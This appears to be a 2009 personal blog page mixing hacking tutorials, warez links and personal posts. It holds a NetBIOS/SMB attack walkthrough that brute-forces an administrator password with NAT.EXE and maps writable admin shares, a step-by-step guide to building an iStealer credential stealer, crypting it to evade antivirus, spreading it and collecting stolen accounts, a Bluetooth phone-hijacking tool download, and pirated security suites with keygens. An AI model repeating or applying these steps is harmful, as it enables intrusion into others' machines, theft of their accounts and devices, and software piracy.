Latest News

L-A-T-E-S-T headlines

Introduce the best SQL injection Tools

Posted by pinoy on Monday, October 19, 2009 , under , , | comments (0)


NetBIOS Attack Methods

Posted by pinoy on , under , | comments (0)



This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows:

NAT.EXE [-o filename] [-u userlist] [-p passlist]



Switches:

-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the speci-
fied file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Passwords should appear one per line in the speci-
fied file.

Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.

[8.0.1] Comparing NAT.EXE to Microsoft's own executables

[8.0.2] First, a look at NBTSTAT

First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.

What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.


C:\nbtstat -A XXX.XX.XXX.XX

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1c> GROUP Registered
DOMAIN1 <1b> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1e> GROUP Registered
DOMAIN1 <1d> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial NetBIOS 16th bit listing:

Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name

Computername <03> UNIQUE Registered by the messenger service. This is the computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1b> Registers the local computer as the master browser for the domain
Domainname <1c> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1d> Registers the local client as the local segments master browser
for the domain
Domainname <1e> Registers as a Group NetBIOS Name
Network Monitor Name
Network Monitor Agent
<06> RAS Server
<1f> Net DDE
<21> RAS Client

[8.0.3] Intro to the NET commands

The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:

[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.

[8.0.5] Net Computer: This adds or deletes computers from a domains database.

[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.

[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.

[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.

[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.

[8.1.0] Net Help: Help with these commands

[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.

[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.

[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.

[8.1.4] Net Pause: Use this command to suspend a certain NT service.

[8.1.5] Net Print: Displays print jobs and shared queues.

[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.

[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.

[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.

[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.

[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services.

[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.

[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.

[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.

[8.2.4] Net View: This command displays a list of resources being shared on a computer. Including netware servers.

[8.2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available:

Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View

For this section, the command being used is the NET VIEW and NET USE commands.

[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.

C:\net view XXX.XX.XXX.XX

Shared resources at XXX.XX.XXX.XX

Share name Type Used as Comment

------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.

NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.


C:\net use /?

The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

C:\net use x: \\XXX.XX.XXX.XX\test

The command completed successfully.

C:\unzipped\nat10bin>net use

New connections will be remembered.

Status Local Remote Network

-------------------------------------------------------------------------------
OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
OK \\XXX.XX.XXX.XX\test Microsoft Windows Network

The command completed successfully.

Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.

C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY


[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt

[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'

[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:

[*]--- This machine has a browse list:

Server Comment
--------- -------
STUDENT1


[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$

[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$

[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON

[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test

[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out

The easiest method of hacking




What you will need for this tutorial - (CLICK THE WORDS)
1.ISTEALER 3.0
2.CRYPTER
3.DRIVEHQ ACCOUNT

all UPLOADS contain the same password.
Password Code:
barcode@inwarez.org

Step 1:
Click the "Drivehq Account" link above, fill in the blank spaces with proper details as you will have to verify the account. Create the account and verify it, write down the details for later reference.

Step 2:
Click the "iStealer 3.0" link above. Download the .zip to a folder or your desktop.

Step 3:
Extract the folder to your desktop, you will be prompted for a password, that can be found below.
Password: barcode@inwarez.org

Step 4:
Open the folder, inside you will find a subfolder and the iStealer executable program. Open the .exe.
Fill in the blanks with the information of your drivehq account you made earlier, make sure the same boxes are ticked and leave the black area alone.

Step 5:
Once your FTP details are filled in, click the "Test FTP" button.




Step 6:
If your FTP is working fine then continue to build the iStealer server by pressing the "Build" button, you will be prompted to save the file. Save it to your desktop, name it whatever you want. If your FTP test was not successfull then please check the details and try again, alternatively post here.
Step 7:
Click the "Crypter" link above and download it to your desktop. Extract it as you previously did with the iStealer. Open the crypter which in this case is BRM Crypt as it is the least detected public one available. First click Add and select the .exe you previously built with the iStealer, you will then be prompted to "Encrypt this file?" click yes.
Step 8:
Ignore all of the steps about file cloning and icon changing, however if you want you can choose to use an error message. Finally, navigate to the "More Settings" tab and press the "Build" button. This will be your final .exe so feel free to name it whatever you want and save it to a place you find fit.

Step 9:
You are now done! All that is left is to distribute the Crypted .exe you made. As this tutorial is for educational purposes only I cannot tell you that you can get a shit load of Rapidshare accounts using this method, so up yours crackers.

Step 10:
Once people have downloaded your crypted stealer, you want to check the logs for any accounts. All you have to do is go to http://www.drivehq.com/file/ShowFolderFrame.aspx? and login. There should be a list of the computers you have infected, the file name will be something like "AdminPC-22832323" which is the name of the PC followed by some random number. What you need to do now is click on the file and inside will be a list of accounts for you to enjoy!!

MY GOLDEN RULE

Posted by pinoy on Tuesday, October 6, 2009 , under | comments (0)



"DO NOT ASSUME UNLESS OTHERWISE SPECIFIED"

THIS IS A PHOTO BLOG TAKEN AT ELIZABETH RESORT..

YOU CAN SEE THE THREE INDIVIDUALS POSING AT THEIR BEST NOT
NOTICING SOMEONE SNEAKING AT THEIR BACK..
YEAH.. THAT MAN SURE WAS HAPPY..

TO RELATE THIS PHOTO WITH MY GOLDEN RULE:
DO NOT ASSUME THAT EVERY SHOT OF THE CAMERA IS GOOD..
SOMETIMES THERE WILL COME AN INSTANCE WHEREIN
THAT GOOD SHOT YOU ASSUMED WAS THE WORST SHOT YOU GET..
THE EFFORT YOU EXERTED BECOMES USELESS..
THE THOUGHT YOU HAVE IN MIND DURING THAT SHOT BECAME
A TRASH YOU JUST THREW AFTER YOU SAW THE OUTPUT..
AND THE TIME YOU SPENT PREPARING FOR THAT SHOT BECAME A
WASTE YOU CAN NO LONGER BROUGHT BACK BECAUSE EVERY SECONDS OF THE
TIME IS ANOTHER TIME...

Swishmax3 Build Date 2009.09.04

Posted by pinoy on , under , , | comments (0)




Advanced Flash creation tool for the graphic artist or web professional. Advanced drawing tools, scripting, Flash video - everything you need for a dynamic Flash animation. New in SWiSH Max3: Project Templates, Knife tool, and much more!

SWiSH Max3 - The Ultimate Flash Creation Tool

Advanced Flash Creation Tool For The Graphic Artist Or Web Professional
Creates Stunning Flash Animations and Websites with Ease
Includes over 350 Preset Multimedia Effects
Includes over 180 Ready-to-use Components and Vector Shapes
Import Images, Graphics, Sound and Video from all popular formats
Export Presentations to Flash, Video, EXE, GIF Animation or Image Sequence
Powerful Scripting Language for Advanced Users
Tools to Control Motion, Draw Shapes, Edit Text, and more
NEW! Project templates - Instant Results Using the Wizard Panel
NEW! Drawing Tools - Shape Operations, Knife Tool, Component Tool
NEW! Improved Motion Path - Editable Bezier Curves, Convert a Shape to Path.

Features
With SWiSH Max3 you can create Flash movies quickly and easily. SWiSH Max3 is packed with features that lets you make stunning interactive Flash animations. Here are some of the features that make SWiSH Max3 so powerful:


Download here:

http://www.mediafire.com/?jmlmymmmmgm

PARA SA IROG KO

Posted by pinoy on Sunday, October 4, 2009 , under | comments (0)




Our heart beats together in HArmony...

Our feelings shared is hard to find these days...

I'm glad we FOund each other just in time...


ILOVEYOU...

Posted by pinoy on , under , , | comments (0)




Hack the bluetooth with this awesome package:

including:

Super Bluetooth Hack

Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
"Call from his phone" it includes all call functions like hold etc.
Super Bluetooth Hack for S60 2nd-3rd devices.


Works very well on sony ericsson phones[TESTED]

Plus some handy extra's!!!!


Download:

Rapidshare:

Code:
http://rapidshare.com/files/111404631/Mobile_BlueTooth_Hacking_and_Extras__AIO_.rar


HotFile:

Code:
http://hotfile.com/dl/8708546/765ae48/Mobile_BlueTooth_Hacking_and_Extras__AIO_.rar.html

Best of 2009(Security Suites)

Posted by pinoy on Saturday, October 3, 2009 , under , , | comments (0)




Best of 2009 (Security Suites)

Best Security Suites of 2008 as on (PC Magazine Vol.19 #4 Pag.78)


This is the last AIO By DArkor & nLa dEviLz
Its in .ISO Format burn to DVD with any burning utility..
Size 892 MB
divided into 10 RAR Files (95.7MB & one of 2.32MB)

It includes:

1. BitDefender Total Security 2008
2. Bullguard Internet Security 8.0
3. CA Internet Security Suite Plus 2008
4. ESET Smart Security
5. F-Secure Internet Security 2008
6. Kaspersky Internet Security 7.0
7. McAfee Total Protection (Retail) No Serial/key needed
8. Norton 360 2.0
9. Norton Internet Security 2008
10. Outpost Security Suite Pro 2008
11. Panda Internet Security 2008
12. Trend Micro Internet Security Pro 2008
13. Winows Live OneCare 2.5
14. ZoneAlarm Internet Security 7


(Serials/Keygens/Patches/installation instruccions included)

Also Everest Ultimate Edition Included as Bonus no need to install
it runs from the CD/DVD Directly

Enjoy!!

By Darkor from FireAnt Co. & nLa dEviLz (AIO Maker)

Download Code:
http://rapidshare.com/files/170995434/Best_of_2008_nLa_dEviLz___FireAnt_Co.
part01.rar
http://rapidshare.com/files/171001050/Best_of_2008_nLa_dEviLz___FireAnt_Co.
part02.rar
http://rapidshare.com/files/171289687/Best_of_2008_nLa_dEviLz___FireAnt_Co.
part03.rar
http://rapidshare.com/files/171306301/Best_of_2008_nLa_dEviLz___FireAnt_Co.
part04.rar
http://rapidshare.com/files/171315776/Best_of_2008_nLa_dEviLz___FireAnt_Co.
part05.rar
http://rapidshare.com/files/171322094/Best_of_2008_nLa_dEviLz___FireAnt_Co.
part06.rar
http://rapidshare.com/files/171330109/Best_of_2008_nLa_dEviLz___FireAnt_Co.
part07.rar
http://rapidshare.com/files/171335977/Best_of_2008_nLa_dEviLz___FireAnt_Co.
part08.rar
http://rapidshare.com/files/171363404/Best_of_2008_nLa_dEviLz___FireAnt_Co.
part09.rar
http://rapidshare.com/files/171365979/Best_of_2008_nLa_dEviLz___FireAnt_Co.
part10.rar


password Code:
www.nd-warez.info

Essential Portfolio Flash Website

Posted by pinoy on , under | comments (0)




Essential Portfolio Flash Website | 16.52 MB

Essential Portfolio is an essential but complete portfolio. Very easy to customize this portfolio is the perfect solution for showing your works and videos. Few steps and your professional and unique portfolio will be on line. Seven modules will help you to adapt the portfolio to your needs

Simple page SImple_age is the simplest module, it can be easily changed by modifying the graphic texts and photos directly with flash instruments.

List This module has an XML generated list. It can be used to list clients, works, partners and links…
Video Module This module has a big Video Module, perfectly integrated in the project. It has been conceived as the perfect page to display a video reel, a presentation video, a demostration video…
XML multivideo page Through this module you can present a large amount of videos. The video list is XML generated.

Gallery is the module with the classic gallery made of thumbnails and big images, completely xml driven. It can display horizontal and vertical images or swf.
Multigallery A great gallery with subgalleries, title, date, description, link.
Contact Form Page A Contact Page with php with thanks mail
HOW IT WORKS The Portfolio is easy to customize with his xml structure. The menu is dynamically generated. The structure of the template can be customized according to your needs. You can change, add or remove items in the menu simply opening with a text editor the file home.xml . Through the home.xml you can set also the alignments, the colors, the columns and rows of your menu. The Essential Portfolio is conceived to be an essential solution to organize a portfolio in few steps.
RANDOM INTRO One of the original features of the Essential Portfolio is that you can decide to load random Home page. Through the main xml you can decide how many home page you want to randomly load. Detailed instructions in the package.

SOME OTHER FEATURES

* Wide screen fit
* Navigation fully configurable
* Dynamic Menu
* Dynamic XML driven projects and galleries
* External Links in the main menu
* Fullscreen Button
* Galleries with sliding movement to show big images
* Random Home Page
* Background Music
* Contact form with php with thanks mail
* Html and detailed help file

* ActionScript 2
* Flash CS3

Download Code:
http://uploading.com/files/TPQMZZXY/EssentialPortfolio.rar.html

Blogger Adsense Guide

Posted by pinoy on , under , | comments (0)




Blogger Adsense Guide

The Future Of Blogs & Why You Need To Act Now - You're going to discover where the future of blogs is headed, why you need to act now and how you are actually doing yourself a big favor even if you throw up a ugly blog!
* Setup Like A Breezy Afternoon - I realize that you don't want to learn complicated software, site programming or any of that other confusing stuff so you don't have to! You can get setup in a breezy afternoon while relaxing!
* Adsense - What Is it? - Here you will learn just what Adsense is and why it's absolutely essential in your plan to profit. You'll learn why it's so easy to make money with and how you can profit with it.
* How To Entice The Click - You're going to learn how you can entice every person who ends up on your new blog to click links all over your blog earning you income. You'll learn secrets to inviting the click that work like wildfire!
* Easy Blog Writing - Here you will learn how you can easily write blog content that your visitors love and generates repeat traffic which, in turn, results in repeat clicks and more income for you!
* Free Services To Use! - You'll learn how you can get setup free. When I say free, I mean absolutely, 100% free!
* The Ultimate Upgrade - In this advanced section you will learn how you can take your blog that you have built up to a profit and give it the major overhaul it needs to generate even more money faster!


Download Code:
http://uploading.com/files/2RULW2J9/BloggerAdsenseGuide.rar.html

FLASH XML EDITOR VERSION 2

Posted by pinoy on , under | comments (1)




New Features in Version 2

- Add and Edit Unlimited XML Files
- Admin and user level login
- Fully configurable tabbed menu
- Upload and Download XML files
- Batch file uploading
- Create new XML files from scratch
- Automatic recognition of node data
- Image resizing and cropping
- WYSIWYG HTML Editor
- MP3 support
- MD5 password security
- Module-based interface structure
- Visual attribute editing
- XML formatting is retained
- CDATA tags are automatically recognized and maintained
- Can edit AS2 or AS3 websites
- and moreĆ¢€¦

WATCH DEMO HERE:

Code:

http://www.flashxmleditor.com/demo/


DOWNLOAD FILE HERE:
Code:
http://uploading.com/files/IJ7EY2DZ/fxmlebysgfx.rar.html
http://hotfile.com/links/8264122/c0c6551/fxmlebysgfx.rar
http://depositfiles.com/files/s30sjjal7

Subscribe Now: google

Add to Google Reader or Homepage